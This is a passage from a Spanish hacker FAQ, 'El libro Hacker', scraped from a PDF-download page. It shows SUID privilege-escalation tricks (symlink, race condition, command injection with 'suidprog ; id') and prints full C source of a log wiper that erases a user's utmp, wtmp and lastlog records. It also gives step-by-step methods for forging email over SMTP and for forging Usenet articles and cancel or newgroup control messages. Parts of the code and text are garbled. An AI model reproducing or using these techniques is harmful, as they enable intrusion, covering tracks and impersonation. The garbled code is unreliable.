Anonimo El libro Hacker

[ Pobierz całość w formacie PDF ]

Ejemplo:
% ln suid.sh -i
% -i
#
3. Explote una condicion de raza
Reemplace un enlace simbólico al programa con otro programa mientras el
kernel carga /bin/sh.
Ejemplo:
nice -19 suidprog ; ln -s evilprog suidroot
4. Env�e una entrada mala al programa.
Invoque el nombre del programa y una orden separada en la misma
l�nea de orden.
Ejemplo:
suidprog ; id
13. �Cómo borro mi presencia de los logs (registros ) del sistema?
Mire /etc/utmp, /usr/adm/wtmp y /usr/adm/lastlog. �stos no son archivos de texto
que se puedan revisar a mano con vi, debe usar un programa
espec�ficamente escrito con este propósito.
Ejemplo:
#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
14. �Cómo env�o falsos mails?
Telnet al puerto 25 de la m�quina donde quieres que el correo apareaca para
generarlo. Ponga su mensaje como en este ejemplo:
HELO bellcore.com
MAIL FROM:voyager@bellcore.com
RCPT TO: jose_maria_Aznar@lamoncloa.gov
DATA
From: voyager@bellcore.com (The Voyager)
To: jose_maria_Aznar@lamoncloa.gov
Subject: Recortes
Reply-To: voyager@bellcore.com
Por favor interrumpa su tonta iniciativa de recortes.
.
QUIT
En sistemas que tengan RFC 931 implementado la linea "MAIL FROM:"
no funcionara. Pruebalo primero enviandote a ti mismo un mail falso.
Para mas informacion lea RFC 822 "Standard for the format of ARPA
Internet text messages"
15. �Cómo falsifico publicacion de articulos y mensajes de control en UseNet?
From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence))
Subject: FAQ: Better living through forgery
Date: 19 Mar 1995 02:37:09 GMT
Noticias anónimas sin remailers "anónimos"
Inspirado por el reciente caso "NetNews Judges-L" este archivo ha sido
puesto al d�a para cubrir los mensajes de mando, as� puede hacer su propio
cancelador de art�culos y crear y destruir su newsgroups propio.
Guarde todos los art�culos de las noticias a un archivo. Lo llamaremos "hak" en este
ejemplo.
Edite "hak", y quite cualquier linea en la cabecera de la forma
From some!random!path!user ( Fijese: "From ", no "From: " !!)
Article:
Lines:
Xref:
Acorte el Path : header a sus ULTIMOS dos o tres componentes "[bangized]"
. �sto hara creer que el art�culo fue publicado do where it really was posted, and
originally hit the net at or near the
host you send it to. O puede construir un path completamente nuevo:Una l�nea
para reflejar su supuesto alias.
Hacemos algunos cambios al campo Message-ID: , �se no est� probablemente
duplicado en ningun mensaje .
Para este usualmente es mejor agregar un par de
car�cteres del azar a la parte antes de el @, desde los pogramas de publicar noticias
generalmente usan un campo de longitud-fija para generar estos IDs.
Cambie los otros t�tulos que dicen como es usted como--From:, Newsgroups:,
Sender:, etc. Reemplaza el texto del mensaje original con su mensaje. Si
publica en un grupo moderado o anuncia un mensaje de control,
acuerdese de poner en un Approved: t�tulo para desviar el mecanismo de moderación.
Para cancelar espec�ficamente algun art�culo, necesitara su mensaje-ID.
Sus cabeceras del mensaje, adem�s de lo qu� esta ya all�, debe tambi�n
contener lo siguiente con este mensaje-ID en �l. �sto le hace un
"mensaje de control." NOTA: mensajes de control generalmente requieren un
header Approved: asi pues, debe agregar uno.
Subject: cmsg cancel
Control: cancel
Approved: luser@twits.site.com
Se crean y destrullen Newsgroups con mensajes de mando, tambien. Si
quiere crear, por ejemplo, comp.misc.microsoft.sucks, sus
headers( cabeceras ) de control se parecer�an a
Subject: cmsg newgroup comp.misc.microsoft.sucks
Control: newgroup comp.misc.microsoft.sucks
Agrega la cadena "moderated" al final de estos si quieres que el grupo
sea "moderado sin moderador" como con alt.hackers. En alguna parte en
el cuerpo de su mensaje, debe incluir el texto siguiente,
cambiado con la descripción del grupo que usted crea:
For your newsgroups file:
comp.misc.microsoft.sucks We don't do windows
Para quitar un grupo, sustitulla rmgroup por newgroup en las l�neas de cabecera.
Tenga presente que en la mayor�a de sitios
todas las demandas rmgroup son puestas en marcha por una persona , el news-
master quien puede o no decidir honrarlo.
La creación del grupo es m�s probable que sea autom�tica no como el borrado en la
mayoria de
instalaciones. Cualquier cambio en un newsgroup sera m�s probable que tenga efecto
si
viene de m�, puesto que mi nombre es (hardwired) en muchos control scripts del
NNTP
, as� es recomendable usar las cabeceras From: y Approved: en �ste
anuncio.
Guarde su articulo cambiado , reviselo para asegurarse que NO contiene ninguna
referencia a ti o a su propio site, y lo
env�a a su servidor favorito NNTP que permite transferirlo via el comando IHAVE ,
usando el siguiente script:
=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
fi
if test ! -f $1 ; then
echo $1: not found
exit 1
fi [ Pobierz całość w formacie PDF ]

pdf; download; ebook; do ÂściÂągnięcia; pobieranie

Archiwum